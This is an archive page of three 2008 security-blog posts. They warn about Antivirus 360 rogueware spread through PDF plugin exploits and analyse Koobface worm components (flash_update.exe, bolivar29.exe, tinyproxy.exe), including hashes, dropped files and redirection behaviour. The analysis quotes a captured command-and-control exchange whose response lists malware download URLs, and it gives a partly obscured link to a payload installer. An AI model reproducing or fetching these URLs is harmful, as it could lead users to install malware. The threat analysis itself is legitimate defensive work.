Archive for December, 2008

Antivirus 360 Distribution – Update Third Party Plugins

Friday, December 12th, 2008

Antivirus 360 is the new Antivirus 2009 indeed. It is spreading using the same old commodity plugin exploit techniques as AV 2009. Be sure to update any QuickTime Player or Adobe Plugins that you may be running to the latest versions.

A number of web sites are delivering a variety of exploits to get this rogueware on your system. One method of delivery that seems to be very reliable is via a set of malformed pdf files. The malware files exploit various versions of the Adobe pdf reader, delivering download and execute shellcode, calling URLDownloadToFileA on hxxp://svc .ms / xrun.tmp, and Winexec on that download.



This file is a custom packed downloader. After a long delay, it contacts multiple web sites, then pulls down a number of files, including another awful Vundo package that was at the top of hit lists for years.
The first popup from the downloaded adware on the system was redirected to the Antivirus 360 Web Scanner, which is nothing more than cheap javascript pretending to scan one’s hard drive and fraudulently claim malware is littering the system. On another system, we saw VirusRemover2008 being hucked by the redirected popup with lots of fraudulent detections and shocking warnings.

So please, keep this stuff off of your system. Update all third party plugins on your system.

AV360 is the New Antivirus 2009

Thursday, December 11th, 2008

Antivirus 360 is the newest Rogueware in high prevalence, while Virustotal AV detection results are extremely low, currently at 3/36. Our ThreatFire community is seeing and preventing far too many hits on this stuff today. It shamelessly re-uses the same AV2009 detection names, like “Spyware.IEMonster”, and presents a simliar 37 phony malware detections on a system. Avoid this Rogueware site. The distributors shamelessly rip names like PC Magazine Editor’s Choice to fabricate credibility:


You may end up with a file like “av360install_770522156496.exe” on your system, which drops av360.exe, among others.
At the very least, if you see this dialog (consistently full of bad english grammar, as in the poorly written Antivirus 2009 dialogs), kill it:

Steer clear of this stuff, here are a few new windows, presenting the same phony malware detections as AV2009 on a clean lab system:

It looks like this one altogether will take the place of Antivirus 2009 — all of the sites that usually serve that Rogueware package are down.

It presents a large phony privacy violation alert early on:


A few phony statements that they might throw in your screen once running are listed here, in a variety of languages:
Threats detected
Privacy violation alert!
Antivirus 360 has detected numerous privacy violations. Some programs may send your private data to an untrusted internet host. Click here to permanently block this activity and remove the possible threat (Recommended)
System files modification alert!
Internal conflict alert!
Antivirus 360 has detected internal software conflict. Some application endeavors to access…
Spyware activity alert!
Spyware.IEMonster is a popular spyware that attempts to steal passwords from Web browsers…
Privacy Violation alert!
Antivirus 360 detected a Privacy Violation. A program is secretly sending your private data to an…
Some critical system files of your computer were modified by malicious program. It may cause system instability and data loss. Click here to block unathorised modification by removing threats (Recommended).
Gefahr! Missbrauch des Datenschutzes!
Antivirus 360 hat Missbrauch des Datenschutzes
Irgendeines Programm sendet heimlich Ihren privaten Daten in die ungesicherte Zone (empfehlt).
Gefahr!
Spyware Aktivitaten! Spyware.IEMonster Aktivitaten wurden festgestellt.
Prevention de la modification des fichiers de systeme!
Prevention de lactivite du Logiciel espion!
Internet Explorer, Mozilla Firefox, Outlook et dautres programmes, y compris des logins et des mots de passe des operations bancaires en ligne, eBay, PayPal….

Koobface Notes — flash_update.exe, bolivar29.exe, tinyproxy.exe

Tuesday, December 9th, 2008

Earlier last week, we first posted our usual warning about the spike in Koobface threats that our ThreatFire users were being protected against on their systems. That post set off some interest in the worm again. The last spike in the worm coincided with Dancho Danchev’s post in November, following the first report in July of high worm prevalence.

Because requests for information and assumptions that the redirection to a video download make it Zlob have been repeated, and because the worm’s components are actively being re-distributed in high prevalence, we’ll spill another Dancho sized mug of coffee over additional and current technical details.

But first, an interesting note for users is that the social engineering scheme used to persuade users into installing the worm does not match the Adobe Flash Player install that the malware distributors are trying to spoof.
On a visit to the real adobe.com site, the user can click on an image to update their flash player:

Internet Explorer users visiting the Flash player install page then can hit “Agree”, and they are provided with an ActiveX install. When Firefox and Chrome users visit the authentic Flash player install site and click on “Agree”, they are prompted to install a file by the name of “install_flash_player.exe”. Neither of these names are used by the worm distributors. The worm is provided as “flash_update.exe”.

Multiple Koobface files are currently of interest here: flash_update.exe, bolivar29.exe, fmark2.dat, multiple batch files that delete these executables, tt_1209658078.exe, 351631.dll and tinyproxy.exe. Keep in mind that the end goal is to spread the 351631.dll file and the tinyproxy.exe files, installing them as a Bho and system service (in the lab, it was installed as the “Shell Hardware Detection (ShellHWDetection)” system service). Both of these components are nasty little bits of adware. When the bho identifies that a user is using a specific search engine, like google or yahoo, they are redirected to other sites. Ads are popped as well.

These were the files installed via a flash_update.exe executable being distributed and run a few hours ago from an unfortunate infected server in Serbia sitting on a home cable internet connection.

Flash_update.exe is a small executable simply packed with upx and encoded to obfuscate strings (http download links, interesting cookie information, etc):
Flash_update.exe
fbbed6d47afa77b21bcce76625be8559
36,864 bytes
upx packed
It drops c:\windows\bolivar29.exe, (an exact duplicate of itself) and calls CreateProcessA on that file to run it.
It writes a batch file to c: to delete itself, and calls CreateProcessA on the batch file and exits.

bolivar29.exe
fbbed6d47afa77b21bcce76625be8559
36,864 bytes
upx packed
Bolivar29.exe is an exact duplicate of flash_update.exe. When started, it checks its own filename. If it is bolivar29.exe, the infection has already occured, so it doesn’t need to drop another copy of itself. It looks for looks for ed323432006.dat on the c: drive and checks for social networking “cookies” and data files. It drops another file, tt_1228867129.exe, into the temp directory, that POSTS back to a web server:
_______________________________________
/fb/first.php HTTP/1.0
Host: 5824125537.com
User-Agent: Mozilla/5.01 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.1) Gecko/20040201 Firefox/3.0.4
Content-type: application/x-www-form-urlencoded
Connection: close
Content-Length: 81

f=0&a=-xxx&v=19&c=2&s=fb&l=&ck=1&c_fb=1&c_ms=0&c_hi=0&c_be=0&c_fr=0&c_yb=0HTTP/1.1 200 OK
Date: Wed, 10 Dec 2008 xx:xx:xx GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 148
Connection: close
Content-Type: text/html

START|http://www.teamtga.com/images/games/gif/tinyproxy23.exe
START|http://www.teamtga.com/images/games/gif/6243.exe
FBTARGETPERPOST|20
#BLACKLABEL
_______________________________________

It pulls the files listed in the response down and installs them.

Tinyproxy.exe is the final install. When it is installed as a service and interacts with the Bho dll it proxies and redirects the infected system’s browser to multiple ad sites. The file itself is copied with Hidden and System attributes, so on most systems, the file is not displayed in a “c:\program files\tinyproxy” folder window.
Last week this file was hosted at the American International Baseball Club web server in Vienna (www.aibc.vienna.org), even though some reports stated it had been taken down. This lastest infection shows that the files are served up at another compromised server. Here is a link to the Bho installer: www.team ga.c om/images/g ames/gif/ 6243.exe.

Last week, we saw our IE web browser redirected to ads from Yahoo! HotJobs, the March of Dimes Foundation, and constant redirections to www-find-www.com and 216.195.52.100.
This time, when we opened a browser to Yahoo!, searched on “Cha Ca Vietnam” and clicked on a result, our browser was redirected to “http://www-find-www.net/?q=cha%20ca”

When we opened a browser to Google on the infected system, searched on “Cha Ca Vietnam” and clicked on a result, a new window popped open to
http://morefindit.com/?q=cha%20ca
with a final redirection to
http://www.toseeka.com/search.php?q=Cha+Am

Ugh. This global mess continues on as a massive financially motivated browser hijacking scam.